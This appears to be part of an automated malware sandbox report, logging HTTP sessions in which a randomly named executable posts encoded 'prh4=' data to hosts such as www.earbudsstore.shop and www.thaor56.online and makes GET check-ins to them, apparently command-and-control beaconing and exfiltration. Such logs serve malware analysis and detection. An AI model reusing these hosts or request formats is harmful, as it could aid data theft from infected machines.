                                                                      Data Raw: 70 72 68 34 3d 58 64 64 7a 52 46 58 70 53 35 69 49 5a 63 48 30 6d 65 4f 52 2f 2f 31 78 6d 49 64 73 53 4d 39 78 64 4b 50 5a 57 41 4d 78 30 37 6a 67 38 58 67 4f 36 45 65 70 77 72 2b 46 4c 48 7a 52 68 30 44 57 7a 32 63 5a 56 6c 68 30 4d 58 36 48 47 71 30 72 51 55 71 58 66 55 66 35 79 57 72 42 50 61 58 42 4e 4a 58 44 56 51 51 5a 53 6d 4e 42 34 4b 4d 6b 78 36 70 66 32 77 51 63 4e 5a 46 6f 71 35 2f 42 6b 74 50 5a 4a 4e 59 62 6e 6e 76 7a 6e 6b 74 62 55 75 44 67 31 58 4b 6f 58 64 41 69 36 33 32 63 58 69 38 70 5a 56 57 4c 6f 38 75 30 4b 6b 4d 32 4f 6b 42 33 50 65 36 50 77 49 4d 6a 68 73 79 64 44 59 57 4e 2f 6b 77 46 69 69 66 64 6f 4f 6d 2f 61 77 59 49 37 55 70 74 44 41 6d 79 76 32 41 69 6f 55 34 6a 50 39 67 34 32 4e 2b 59 69 6e 30 36 35 69 54 61 72 68 75 54 38 62 6b 77 64 46 57 7a 34 44 38 4b 54 30 74 4f 63 49 4f 47 46 74 78 41 50 54 7a 2b 68 47 76 56 74 46 37 4a 34 32 31 57 53 46 5a 44 47 2f 2f 49 76 70 39 6c 57 4a 37 36 34 44 7a 6d 54 63 59 56 33 6c 55 6e 5a 4c 50 74 58 31 62 55 78 67 38 5a 67 76 36 58 2b [TRUNCATED]
                                                                      Data Ascii: prh4=XddzRFXpS5iIZcH0meOR//1xmIdsSM9xdKPZWAMx07jg8XgO6Eepwr+FLHzRh0DWz2cZVlh0MX6HGq0rQUqXfUf5yWrBPaXBNJXDVQQZSmNB4KMkx6pf2wQcNZFoq5/BktPZJNYbnnvznktbUuDg1XKoXdAi632cXi8pZVWLo8u0KkM2OkB3Pe6PwIMjhsydDYWN/kwFiifdoOm/awYI7UptDAmyv2AioU4jP9g42N+Yin065iTarhuT8bkwdFWz4D8KT0tOcIOGFtxAPTz+hGvVtF7J421WSFZDG//Ivp9lWJ764DzmTcYV3lUnZLPtX1bUxg8Zgv6X+9fG03fY12bbqlcRK4yJA6nzE8878oanEnhZ0oK+EqnDG7ZEFdhLq4y1S5Rm81htbwMF6sZN/5jqzjakUhhgS3hOXEo33yor5jbIJ1xGzXjAKN2Lszv9PCg58kW3zshBAK36ovzuoU1TkIzFgZPmn67OFxVONGN/mt6vGV2atxyhCCkioAaIUWKXWvjATPgs3LoIxGPQlUqTgew/QAN/AN6YZ1SxdKwA1kLsP/7ivm/Wrvh9pSMOjUEDiYaW1uLoKMu9oh8cUrgrANS4qGJxIxgE5sExdsd0nTq99Tz++pRUkIMKko246PeFd8ZJvh5y2B7w40HFU3mdBrpshIU6AWRN7nMeMQaJCbC1M6L/DwZM6ZimDucoAnPLV3q07+sw7ia89qA0c2cPR3BJvHSCEe2XoYqordijiNmACYRivVGo4bIUoScG3wGmuCT4OsKXnyWRVwPvi3YUjA4jCbmR5w4HNca5X16kA1VuQTLQFpjCqupNtehOiqGrLaqfByJfwm+Zjrt4egz7431Jgs30YKEhniEsHsoF5HglvEAW7Xk25S2KpYysxtA09vQuuCibaPCrDdq+BTzdlQKHM5DAD3h0T9OF9wfm7Ve1Ix8vrAxUC4Q5YP04uaef1MUMMBq90khXXhoOm+XLcc/xzOar4fIra+PTvE4RbVy [TRUNCATED]
                                                                      Nov 20, 2024 09:23:45.900249004 CET1236INHTTP/1.1 404 Not Found
                                                                      Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      Content-Length: 1251
                                                                      Content-Type: text/html
                                                                      Date: Wed, 20 Nov 2024 08:23:45 GMT
                                                                      Pragma: no-cache
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                      Nov 20, 2024 09:23:45.900316954 CET234INData Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69
                                                                      Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      12192.168.2.1049988202.92.5.23806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:23:47.522109985 CET495OUTGET /cboa/?prh4=af1TSyH9ZKWDWOLime6W6+N8m41wPvg6MbDiaGUzr5LnkxoPx276h77cE37euV2f02htPG9gF0GAKqxhPgTdbhPG43TCObvDHb/CcXEoGnF55JIhuw==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.thaor56.online
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Nov 20, 2024 09:23:48.478888988 CET1236INHTTP/1.1 404 Not Found
                                                                      Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                      Content-Length: 1251
                                                                      Content-Type: text/html
                                                                      Date: Wed, 20 Nov 2024 08:23:48 GMT
                                                                      Pragma: no-cache
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                      Nov 20, 2024 09:23:48.478913069 CET234INData Raw: 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69
                                                                      Data Ascii: 5, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      13192.168.2.1049989194.195.220.41806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:23:53.662223101 CET762OUTPOST /0gis/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Origin: http://www.earbudsstore.shop
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.earbudsstore.shop/0gis/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 58 4f 44 38 6a 49 2f 6d 36 56 2f 36 5a 71 54 36 57 38 75 78 30 44 48 39 7a 32 46 76 6c 38 4f 45 76 54 64 75 45 46 6a 42 32 4d 7a 2f 47 6e 6b 4c 52 6e 35 58 35 32 68 4b 67 4c 38 56 65 53 4d 31 36 49 49 6d 4e 6c 62 42 59 33 6d 59 6f 55 5a 4d 6c 65 65 57 56 45 62 4f 57 48 38 2b 51 4e 5a 69 39 41 34 73 53 34 57 54 4e 34 30 7a 51 78 67 64 58 78 32 54 50 58 4b 54 49 69 65 32 46 66 6c 6e 2b 49 35 68 66 41 4b 69 67 42 2b 69 43 77 41 33 34 6f 4b 6c 45 42 67 35 72 52 36 62 68 49 67 69 57 43 54 4d 6d 4a 30 6b 33 37 38 49 55 6d 30 62 70 54 4a 57 63 63 73 63 4e 48 30 5a
                                                                      Data Ascii: prh4=XOD8jI/m6V/6ZqT6W8ux0DH9z2Fvl8OEvTduEFjB2Mz/GnkLRn5X52hKgL8VeSM16IImNlbBY3mYoUZMleeWVEbOWH8+QNZi9A4sS4WTN40zQxgdXx2TPXKTIie2Ffln+I5hfAKigB+iCwA34oKlEBg5rR6bhIgiWCTMmJ0k378IUm0bpTJWccscNH0Z
                                                                      Nov 20, 2024 09:23:54.162729979 CET875INHTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 20 Nov 2024 08:23:54 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 61 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 5b 73 a2 30 14 80 df fb 2b 58 1e 3a bb 33 ab 5c d4 5a b7 d0 1d 7b d1 e2 60 ed 54 ab c0 4b 27 24 29 89 0d 09 85 20 e2 ce fe f7 45 ec 56 77 ec cb e6 81 e4 9c 93 73 fb 12 62 7d b9 99 5c cf fc 87 5b 85 c8 98 5d 9e 58 db 49 61 80 47 b6 8a b9 7a 79 a2 54 c3 22 18 a0 dd b2 16 63 2c 81 02 09 48 33 2c 6d f5 69 36 68 9c bf ef dc 9b 89 94 49 03 bf e5 74 65 ab eb 46 0e 1a 50 c4 09 90 34 64 58 55 a0 e0 12 f3 ca d7 b9 b5 31 8a f0 91 37 07 31 b6 d5 15 c5 45 22 52 79 e0 50 50 24 89 8d f0 8a 42 dc a8 85 ef 0a e5 54 52 c0 1a 19 04 0c db 46 53 3f 0c 27 a9 64 f8 d2 d2 76 73 dd 4e 5d 24 17 19 4c 69 22 f7 6d 7d 5e 7b 8a 5f 52 9c 91 83 12 f4 8b 3c 65 f6 b6 bf 1f 9a 56 14 45 57 6f 62 90 86 39 ca 32 29 52 dc cc 88 48 34 55 d1 f6 91 2d ed 38 9b 55 43 3c a4 74 9c a9 f3 5f 99 2c 6d 7f 4c 56 28 50 a9 08 ce 04 40 b6 8a c4 f3 6e f9 f5 db 21 9a 1d 00 45 96 49 c5 5a e2 b5 d4 96 60 05 76 da 83 7d 5b 2e 2f 39 87 92 0a ae 1c 84 52 7e 7d d0 dc 6e d9 8e 82 72 24 8a a6 14 49 93 09 58 9d [TRUNCATED]
                                                                      Data Ascii: 2ab[s0+X:3\Z{`TK'$) EVwsb}\[]XIaGzyT"c,H3,mi6hIteFP4dXU171E"RyPP$BTRFS?'dvsN]$Li"m}^{_R<eVEWob92)RH4U-8UC<t_,mLV(P@n!EIZ`v}[./9R~}nr$IXMR.=(eV}"Lgv5:vIp(q92`J'O}{#Kvj8Fn$c1+B-7~2v6`+ZDN<X@xDwM""=&^aOu,z"2Y?LI`#(f;d_ y?egz.d<bMBI9 oxo/Q663XNv6=T1u9\.7K^g'Bn0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      14192.168.2.1049990194.195.220.41806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:23:56.214131117 CET786OUTPOST /0gis/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Origin: http://www.earbudsstore.shop
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.earbudsstore.shop/0gis/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 58 4f 44 38 6a 49 2f 6d 36 56 2f 36 57 71 6a 36 46 50 47 78 6a 7a 48 38 76 6d 46 76 72 63 4f 41 76 54 68 75 45 42 37 52 32 5a 6a 2f 47 43 41 4c 4c 6d 35 58 36 32 68 4b 76 72 38 63 61 53 4d 75 36 49 45 55 4e 6e 50 42 59 33 69 59 6f 56 70 4d 6d 76 65 58 48 6b 62 41 65 6e 38 38 55 4e 5a 69 39 41 34 73 53 37 71 35 4e 34 63 7a 54 42 51 64 57 56 69 55 4a 6e 4b 51 42 43 65 32 42 66 6c 6a 2b 49 34 45 66 45 4c 46 67 45 69 69 43 78 51 33 35 36 79 6d 4e 42 67 2f 76 52 37 6c 73 6f 38 76 62 42 37 4b 6e 70 30 77 32 59 4d 37 58 48 4a 63 34 43 6f 42 50 72 77 53 44 42 42 7a 2b 69 35 74 5a 70 2b 70 76 6b 30 58 72 65 61 30 69 5a 57 54 41 67 3d 3d
                                                                      Data Ascii: prh4=XOD8jI/m6V/6Wqj6FPGxjzH8vmFvrcOAvThuEB7R2Zj/GCALLm5X62hKvr8caSMu6IEUNnPBY3iYoVpMmveXHkbAen88UNZi9A4sS7q5N4czTBQdWViUJnKQBCe2Bflj+I4EfELFgEiiCxQ356ymNBg/vR7lso8vbB7Knp0w2YM7XHJc4CoBPrwSDBBz+i5tZp+pvk0Xrea0iZWTAg==
                                                                      Nov 20, 2024 09:23:56.721313953 CET875INHTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 20 Nov 2024 08:23:56 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 61 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 5b 73 a2 30 14 80 df fb 2b 58 1e 3a bb 33 ab 5c ac b5 6c a1 3b d6 56 8b 83 b5 53 ad 0a 2f 9d 90 a4 26 36 24 14 82 88 3b fb df 17 b0 5b dd b1 2f 9b 07 92 73 4e ce ed 4b 88 fd e5 66 dc 9b fa 0f b7 0a 91 11 bb 3a b1 ab 49 61 80 2f 1d 15 73 f5 ea 44 29 87 4d 30 40 bb 65 2d 46 58 02 05 12 90 a4 58 3a ea d3 b4 df b8 78 df b9 37 13 29 e3 06 7e cb e8 da 51 37 8d 0c 34 a0 88 62 20 69 c8 b0 aa 40 c1 25 e6 a5 af 7b eb 60 b4 c4 47 de 1c 44 d8 51 d7 14 e7 b1 48 e4 81 43 4e 91 24 0e c2 6b 0a 71 a3 16 be 2b 94 53 49 01 6b a4 10 30 ec 18 4d fd 30 9c a4 92 e1 2b 5b db cd 75 3b 75 91 5c a4 30 a1 b1 dc b7 f5 79 ed 09 7e 49 70 4a 0e 4a d0 2f b3 84 39 55 7f 3f 34 2d cf f3 8e de c4 20 09 33 94 a6 52 24 b8 99 12 11 6b aa a2 ed 23 db da 71 36 bb 86 78 48 e9 38 53 fb bf 32 d9 da fe 98 ec 50 a0 42 11 9c 09 80 1c 15 89 e7 dd f2 eb b7 43 34 3b 00 8a 2c e2 92 b5 c4 1b a9 ad c0 1a ec b4 07 fb 2a 2e 2f 19 87 92 0a ae 1c 84 52 7e 7d d0 ac b6 54 23 a7 1c 89 bc 29 45 dc 64 02 96 a7 [TRUNCATED]
                                                                      Data Ascii: 2ab[s0+X:3\l;VS/&6$;[/sNKf:Ia/sD)M0@e-FXX:x7)~Q74b i@%{`GDQHCN$kq+SIk0M0+[u;u\0y~IpJJ/9U?4- 3R$k#q6xH8S2PBC4;,*./R~}T#)Ed-x})}K_2vUZ~"L2yF:3' Y.^v`1^K=w{n-h!{bZE3o*I{Vo|For`At$z8Sqqh'x`&VoaM<XE,Lsb>`n|ZBtT('47&!a[jkh1o_imGSOj}V+>lfl7{|)cTu\w.7[.hh0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      15192.168.2.1049991194.195.220.41806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:23:58.763293982 CET1799OUTPOST /0gis/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Origin: http://www.earbudsstore.shop
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.earbudsstore.shop/0gis/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 58 4f 44 38 6a 49 2f 6d 36 56 2f 36 57 71 6a 36 46 50 47 78 6a 7a 48 38 76 6d 46 76 72 63 4f 41 76 54 68 75 45 42 37 52 32 5a 72 2f 47 78 34 4c 52 42 74 58 37 32 68 4b 6d 4c 38 52 61 53 4e 32 36 49 4d 51 4e 6e 44 37 59 31 4b 59 6f 33 52 4d 6a 64 32 58 65 55 62 41 53 48 38 2f 51 4e 59 6d 39 41 49 6f 53 34 53 35 4e 34 63 7a 54 48 55 64 41 78 32 55 53 6e 4b 54 49 69 65 36 46 66 6c 48 2b 49 67 79 66 45 50 2f 67 33 36 69 44 52 67 33 36 4a 4b 6d 50 68 67 39 6a 78 37 74 73 6f 78 76 62 42 6d 31 6e 71 6f 61 32 62 63 37 48 47 67 71 6f 58 49 66 61 61 45 5a 43 52 51 57 30 47 6c 72 5a 72 37 76 6c 6b 4e 58 33 4e 48 46 72 4e 61 57 44 6b 53 66 61 7a 6e 6a 4d 77 6d 69 35 35 5a 35 51 47 73 61 31 6e 47 36 79 59 47 58 31 78 39 54 47 36 69 35 2f 75 76 79 76 65 69 43 4b 79 6b 6d 4a 56 33 6e 49 61 54 4d 30 35 54 49 7a 65 53 57 65 7a 46 63 6c 6d 39 4f 45 56 4b 33 6e 6c 46 4a 49 75 57 71 77 59 4f 57 43 55 71 59 34 4e 34 6c 42 76 49 4b 46 4f 68 71 55 4c 75 4a 77 37 7a 64 76 69 2b 6a 41 4e 4b 5a 64 43 69 78 43 [TRUNCATED]
                                                                      Data Ascii: prh4=XOD8jI/m6V/6Wqj6FPGxjzH8vmFvrcOAvThuEB7R2Zr/Gx4LRBtX72hKmL8RaSN26IMQNnD7Y1KYo3RMjd2XeUbASH8/QNYm9AIoS4S5N4czTHUdAx2USnKTIie6FflH+IgyfEP/g36iDRg36JKmPhg9jx7tsoxvbBm1nqoa2bc7HGgqoXIfaaEZCRQW0GlrZr7vlkNX3NHFrNaWDkSfaznjMwmi55Z5QGsa1nG6yYGX1x9TG6i5/uvyveiCKykmJV3nIaTM05TIzeSWezFclm9OEVK3nlFJIuWqwYOWCUqY4N4lBvIKFOhqULuJw7zdvi+jANKZdCixCgbwuoVhG5kUXB1RjwM+BKfRSH7VS8gpNbwcthNnJ9xIZ7nap1MQWNRs9cbMbeRte3/67Wi6+PN1m6IuF4nrBC2XXIqxYpFjiMpx6R0VyWkihXUDCBpFgfGVxNfBmDPIBqp6+D6Dy6kjfC8v1D20Gza7yKnVvixjqNK+Pb/atsjRJwV0PcL4jF26Ovz+o/0B2UlfZJcrEWxKPmTcwVgMcCecM/FgDlnczTwAngzwx/Rsvc7gXtUmDhHZhy08J9p98E2Fq5/I5Ip3fwmGFK57fmcHTbJgiZg2NMosyL3pLzI+hv87QYp69mYRAdbBIG+KeB40vW2K2rf9PVok2CI3SuXdFYhuQSJ50kPt5fqC0MctD3wyvzHQfQOf/jzenlMhIcsOOflLCpi2wu/eLTKdbTOVaMdOlfmFuSfxW4lhVrQi8PxhikVXRixXSUYW6ioo6cFF37KBxODTCjA1ZrRA0aEDYWLF8RZ/uk96wMekgNgoXbyQufyohwtZMg2618OpvpRsI27YbJ8d3e7N/E0XAg2Ctq9DXXxqgB+ZurVqfCbsMN5rHgetvORe5SrYAZ18DtZYeijEjl5IFOC8lJ4PRzVc+qyua2wgyYyhoMmQilF7FomF8EuGCc/7WZowfv4FUC+QxGOuRmm0cvPHgrFVCjGaIS7Do2xmpa8 [TRUNCATED]
                                                                      Nov 20, 2024 09:23:59.261960983 CET875INHTTP/1.1 200 OK
                                                                      Server: openresty/1.13.6.1
                                                                      Date: Wed, 20 Nov 2024 08:23:59 GMT
                                                                      Content-Type: text/html
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Content-Encoding: gzip
                                                                      Data Raw: 32 61 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 5b 73 a2 30 14 80 df fb 2b 58 1e 3a bb 33 ab dc ac 96 2d 74 c7 5e b4 38 58 3b d5 aa f0 d2 09 49 6a 62 43 42 21 88 b8 b3 ff 7d 11 bb d5 1d fb b2 79 20 39 e7 e4 dc be 84 38 5f 6e 46 d7 93 e0 e1 56 21 32 66 97 27 ce 76 52 18 e0 0b 57 c5 5c bd 3c 51 aa e1 10 0c d0 6e 59 8b 31 96 40 81 04 a4 19 96 ae fa 34 e9 35 ce df 77 ee cd 44 ca a4 81 df 72 ba 72 d5 75 23 07 0d 28 e2 04 48 1a 31 ac 2a 50 70 89 79 e5 eb dd ba 18 2d f0 91 37 07 31 76 d5 15 c5 45 22 52 79 e0 50 50 24 89 8b f0 8a 42 dc a8 85 ef 0a e5 54 52 c0 1a 19 04 0c bb 46 53 3f 0c 27 a9 64 f8 d2 d1 76 73 dd 4e 5d 24 17 19 4c 69 22 f7 6d 7d 5e 7b 8a 5f 52 9c 91 83 12 f4 8b 3c 65 ee b6 bf 1f 9a 56 14 45 47 6f 62 90 46 39 ca 32 29 52 dc cc 88 48 34 55 d1 f6 91 1d ed 38 9b 53 43 3c a4 74 9c e9 ec bf 32 39 da fe 98 9c 48 a0 52 11 9c 09 80 5c 15 89 e7 dd f2 eb b7 43 34 3b 00 8a 2c 93 8a b5 c4 6b a9 2d c1 0a ec b4 07 fb b6 5c 5e 72 0e 25 15 5c 39 08 a5 fc fa a0 b9 dd b2 1d 05 e5 48 14 4d 29 92 26 13 b0 3a [TRUNCATED]
                                                                      Data Ascii: 2ab[s0+X:3-t^8X;IjbCB!}y 98_nFV!2f'vRW\<QnY1@45wDrru#(H1*Ppy-71vE"RyPP$BTRFS?'dvsN]$Li"m}^{_R<eVEGobF92)RH4U8SC<t29HR\C4;,k-\^r%\9HM)&:mKqu\f?k.F2u-iwn[S!NA\\Rs|H.K]{in c1+d!#]{G9-us&Y"e0L"Z^$0{:o$x8Yfbf`f|ZU,RtD/('4?(Fldv9yE^VG;g!63\v6=T1y\w.7G^g] ?0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.1049992194.195.220.41806808C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 20, 2024 09:24:01.329334021 CET498OUTGET /0gis/?prh4=aMrcg/vn2G/nVrnfdsqttTKn7l5IpN7CuDhUOTj2ocWrQXkoPHFbln1FmLoTaWY74KRoWkXSZUSbj2dC1qWbZWPyRks4Yv4++AQZW9eiSbZnXCVOCA==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.earbudsstore.shop
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
